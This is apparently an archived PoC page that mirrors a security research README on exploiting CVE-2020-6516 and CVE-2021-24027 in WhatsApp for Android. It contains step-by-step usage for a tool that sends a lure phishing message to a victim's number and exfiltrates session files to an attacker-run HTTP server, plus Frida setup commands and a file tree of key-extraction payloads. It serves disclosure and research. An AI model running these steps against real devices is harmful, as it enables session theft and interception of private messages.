POC details: b29b2f958701fb2401d4cb3fd7aff47fe4223988

Source
Related vulnerability
Title: Facebook WhatsApp security vulnerability (CVE-2021-24027)
Description: Facebook WhatsApp is a mobile application from the US company Facebook that sends messages over the Internet. It uses the contact information on a smartphone to find contacts who also use the software and lets users send them text, images and other content. WhatsApp Business is the commercial edition of WhatsApp. WhatsApp for Android v2.21.4.18 and WhatsApp Business for Android v2.21.4.18 contain a security vulnerability that allows a third party with access to the device's external storage to read cached TLS material.
Description
PoC and tools for exploiting CVE-2020-6516 (Chrome) and CVE-2021-24027 (WhatsApp)
Introduction
# WhatsApp MitD & MitM

## Introduction

This repository contains PoC code and tools that were developed as part of our
research [01] on remotely exploiting *Man-in-the-Disk* (MitD) vulnerabilities on
WhatsApp for Android. As discussed in our blog post, the code and accompanying
scripts found here were used to exploit CVE-2020-6516 (Chrome) [02] and
CVE-2021-24027 (WhatsApp) [03].

The structure of this repository is as follows:

* The current directory contains the Python tool that hooks WhatsApp using Frida,
  sends the phishing message carrying the CORS bypass payload and runs the HTTP
  server to which exfiltrated session files from the victim device are sent.

* **tls12\_psk\_extract/** contains the TLS v1.2 MitM toolset. See **README.md**
  in that directory for more information on how to prepare a MitM environment.

* **watls\_psk\_extract/** contains the TLS v1.3 (WaTLS) MitM toolset. See
  **README.md** in that directory for more information on how to prepare a MitM
  environment.

* **openssl-1.1.1f-patches/** contains OpenSSL 1.1.1f patches required for
  setting up TLS v1.2 and/or TLS v1.3 MitM environments.

* **secrets/** holds a simple shell script and an OpenSSL configuration for
  generating certificates similar to those used by the WhatsApp TLS v1.3
  infrastructure. The generated keys and certificates can be used for both
  TLS v1.2 and v1.3 MitM.

* Last but not least, **misc/** contains various Frida scripts that were used
  for testing and debugging purposes during our research and might be helpful to
  other researchers.


## Usage

To test the PoC you need an Android device running WhatsApp 2.20.206.22 [04].
Our code was initially developed for 2.19.355, and the corresponding snippets
can still be found under **frida_scripts/**, but that version is nowadays
considered "expired" and won't work.

Before firing up the PoC, it is a good idea to compile as little as possible of
WhatsApp's DEX code. Doing so might proactively help in avoiding issues like
Frida not being able to hook specific methods.

    adb shell
    am force-stop com.whatsapp
    pm compile -f -m space com.whatsapp
    am start com.whatsapp/.Main

Download the Frida server and push it to your Android device under **/data/local/tmp**,
leaving the default file name as is. Version 12.8.10 is tested and known to work
well. Feel free to download a more recent one if you prefer. The PoC will
automatically detect the Frida server binary and will attempt to execute it with
the appropriate command line arguments.

    cd /tmp
    curl -O https://github.com/frida/frida/releases/download/12.8.10/frida-server-12.8.10-android-arm64.xz
    xz -d frida-server-12.8.10-android-arm64.xz
    adb push frida-server-12.8.10-android-arm64 /data/local/tmp

The main logic of the exploit is implemented in **main.py**. Files **adb.py**
and **frida_util.py** are trimmed down versions of tools that we use internally
for various debugging tasks on Android devices.

To run the PoC, attach your Android device to your computer and run the
following command:

    python3 main.py -s ANDROID_SERIAL -a 192.168.1.100 -p 8000 -r \
        images/the_guardian.jpg MOBILE_NUMBER@s.whatsapp.net "Rush for Mediterranean gas"

The command line switches passed to **main.py** are the following:

* `-s` - The serial number of the Android device to use, in case the attacker
  has multiple Android devices attached to their computer.

* `-a` and `-p` - Address and port, respectively, of the HTTP server where the
  exfiltrated sessions will be sent to.

* `-r` - Instructs **main.py** to start the aforementioned HTTP server on the
  local computer. If you don't pass `-r`, make sure you run **server.py** on the
  host specified by `-a` and `-p`.

Positional arguments are the following:

* **images/the_guardian.jpg** - A JPG image that will be used as a fake message
  preview, in order to lure the victim into clicking on it.

* **MOBILE_NUMBER@s.whatsapp.net** - The victim's mobile phone number in WhatsApp
  format. This is usually the country prefix followed by the mobile number. For
  example, Greek numbers (+30) look like `301234567890@s.whatsapp.net`.

* **"Rush for Mediterranean gas"** - An arbitrary string to be used as the
  message caption.

For a real-life usage example, have a look at our blog post, and more specifically
at the demonstration videos.


## References

[01] <https://www.census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/>

[02] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516>

[03] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24027>

[04] <https://www.apkmirror.com/apk/whatsapp-inc/whatsapp/whatsapp-2-20-206-22-release/whatsapp-messenger-2-20-206-22-android-apk-download/>

File snapshot

    [4.0K] /data/pocs/b29b2f958701fb2401d4cb3fd7aff47fe4223988
    ├── [1.9K] adb.py
    ├── [ 111] common.py
    ├── [4.0K] exploit
    │   └── [6.2K] exploit.html
    ├── [4.0K] frida_scripts
    │   ├── [ 820] README.md
    │   ├── [ 545] version.js
    │   ├── [4.0K] whatsapp-2.19.355
    │   │   ├── [3.7K] expire.js
    │   │   └── [5.7K] phish.js
    │   └── [4.0K] whatsapp-2.20.206.22
    │       └── [5.7K] phish.js
    ├── [ 12K] frida_util.py
    ├── [4.0K] images
    │   └── [ 19K] the_guardian.jpg
    ├── [ 970] logger.py
    ├── [4.0K] main.py
    ├── [4.0K] misc
    │   ├── [ 141] dump_hprof.js
    │   ├── [1.6K] README.md
    │   ├── [4.0K] whatsapp-2.19.355
    │   │   ├── [2.9K] extssl_download.js
    │   │   ├── [3.2K] sniff.js
    │   │   ├── [3.4K] watls_download.js
    │   │   └── [2.9K] watls_unzip_trigger.js
    │   ├── [4.0K] whatsapp-2.20.200.22
    │   │   ├── [2.9K] extssl_download.js
    │   │   └── [3.2K] sniff.js
    │   └── [4.0K] whatsapp-2.20.206.22
    │       ├── [2.9K] extssl_download.js
    │       ├── [3.2K] sniff.js
    │       ├── [3.9K] watls_download.js
    │       └── [2.9K] watls_unzip_trigger.js
    ├── [4.0K] openssl-1.1.1f-patches
    │   ├── [4.0K] tls12-mitm.diff
    │   └── [3.4K] watls-mitm.diff
    ├── [4.7K] README.md
    ├── [4.0K] secrets
    │   ├── [ 476] cert.conf
    │   └── [ 225] gen_certs.sh
    ├── [2.1K] server.py
    ├── [4.0K] tls12_psk_extract
    │   ├── [2.7K] boringssl_session.cpp
    │   ├── [ 426] convert_session.sh
    │   ├── [4.0K] key_extractor_payload
    │   │   ├── [4.0K] key_extractor
    │   │   │   ├── [ 225] axolotl.proto
    │   │   │   ├── [6.2K] KeyExtractor.java
    │   │   │   ├── [ 704] Logger.java
    │   │   │   ├── [1.1K] Main.java
    │   │   │   └── [ 802] Makefile
    │   │   ├── [ 205] Makefile
    │   │   ├── [1.1K] Makefile.config
    │   │   ├── [ 348] README.md
    │   │   └── [4.0K] stub
    │   │       ├── [ 452] create_zip.sh
    │   │       ├── [  89] dex.h
    │   │       ├── [ 132] dex.S
    │   │       ├── [ 510] log.c
    │   │       ├── [ 172] log.h
    │   │       ├── [ 670] Makefile
    │   │       ├── [7.5K] stub.c
    │   │       └── [ 208] stub.h
    │   ├── [ 976] Makefile
    │   ├── [ 10K] openssl_http_pipe.py
    │   ├── [6.3K] openssl_session.c
    │   ├── [4.0K] payload
    │   │   ├── [ 505] create_zip.sh
    │   │   ├── [ 201] libwhatsapp.c
    │   │   ├── [ 330] Makefile
    │   │   └── [ 437] README.md
    │   ├── [4.1K] README.md
    │   └── [8.6K] run_server.sh
    └── [4.0K] watls_psk_extract
        ├── [ 933] Makefile
        ├── [3.1K] README.md
        ├── [5.7K] ReflectionAPI.java
        ├── [2.5K] run_server.sh
        ├── [ 235] run.sh
        └── [4.9K] WatlsPskExtract.java

    17 directories, 63 files
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the PoC through the original source first.
    2. If the source has expired or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.